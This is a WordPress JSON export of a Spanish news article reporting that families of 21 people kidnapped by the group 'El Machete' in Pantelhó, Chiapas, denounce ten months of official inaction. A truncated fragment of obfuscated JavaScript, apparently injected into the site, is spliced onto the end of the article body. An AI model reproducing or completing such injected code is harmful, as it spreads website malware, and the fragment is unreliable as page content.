{"id":2551,"date":"2022-06-02T00:38:58","date_gmt":"2022-06-02T00:38:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2551"},"modified":"2022-06-02T00:38:59","modified_gmt":"2022-06-02T00:38:59","slug":"se-cumplen-10-meses-desaparicion-de-21-secuestrados-en-pantelho","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2551","title":{"rendered":"Se cumplen 10 meses desaparici\u00f3n de 21 secuestrados en Pantelh\u00f3"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/received_602670441147118-1024x576.jpeg\" alt=\"\" class=\"wp-image-2552\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/received_602670441147118-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/received_602670441147118-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/received_602670441147118-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/received_602670441147118-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/received_602670441147118.jpeg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>01 de Junio del 2022. San Crist\u00f3bal de Las Casas.- Familiares de las 21 personas secuestradas y desaparecidas por el grupo paramilitar \u201cEl Machete\u201d realizaron un pronunciamiento, ya que se cumplen 10 meses de sufrimiento y agon\u00eda por no saber en d\u00f3nde se encuentran, lo cual es muy doloroso cada d\u00eda.<\/p>\n\n\n\n<p>En un comunicado, manifiestan que se encuentran viviendo una omisi\u00f3n e inoperancia por parte de las autoridades competentes, ya que no han hecho nada para salvaguardar la vida e integridad de sus 21 familiares.<\/p>\n\n\n\n<p>\u201cVemos con gran tristeza la omisi\u00f3n, ya que los integrantes del grupo armado de los machetes que se llevaron secuestrados a nuestros familiares son bien recibidos por parte de Secretar\u00eda de Gobierno y Congreso del estado sin que se les exija la presentaci\u00f3n inmediata con vida de nuestros familiares mientras a nosotros se nos ha reprimido cuando hemos acudido para pedir ayuda a la liberaci\u00f3n con vida de nuestros familiares\u201d.<\/p>\n\n\n\n<p>Se\u00f1alaron que han visto como retenidos de otros municipios han sido liberados como el caso de Altamirano, donde las autoridades presumen su intervenci\u00f3n, \u201cpero por nuestros 21 familiares no han hecho nada, lo hemos perdido todo; pero seguimos en pie de lucha contra un gobierno omiso, represor e inhumano que claramente est\u00e1 protegiendo al grupo paramilitar.<\/p>\n\n\n\n<p>Por lo anterior, exigen a las autoridades la presentaci\u00f3n inmediata con vida de sus 21 familiares que giren las \u00f3rdenes de aprehensi\u00f3n para los responsables de la desaparici\u00f3n forzada \u201cde nuestros familiares los cuales est\u00e1n plenamente identificados. Exigimos investigaci\u00f3n a fondo por parte del gobierno mexicano, y organismos internacionales, a funcionarios por su omisi\u00f3n para localizar con vida a nuestros familiares\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 01 de Junio del 2022. San Crist\u00f3bal de Las Casas.- Familiares de las 21 personas secuestradas y desaparecidas por el grupo paramilitar \u201cEl Machete\u201d realizaron un pronunciamiento, ya que se cumplen 10 meses de sufrimiento y agon\u00eda por no saber en d\u00f3nde se encuentran, lo cual es muy doloroso cada d\u00eda. En un &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2552,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-2551","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2551","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2551"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2551\/revisions"}],"predecessor-version":[{"id":2553,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2551\/revisions\/2553"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2552"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2551"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2551"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2551"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}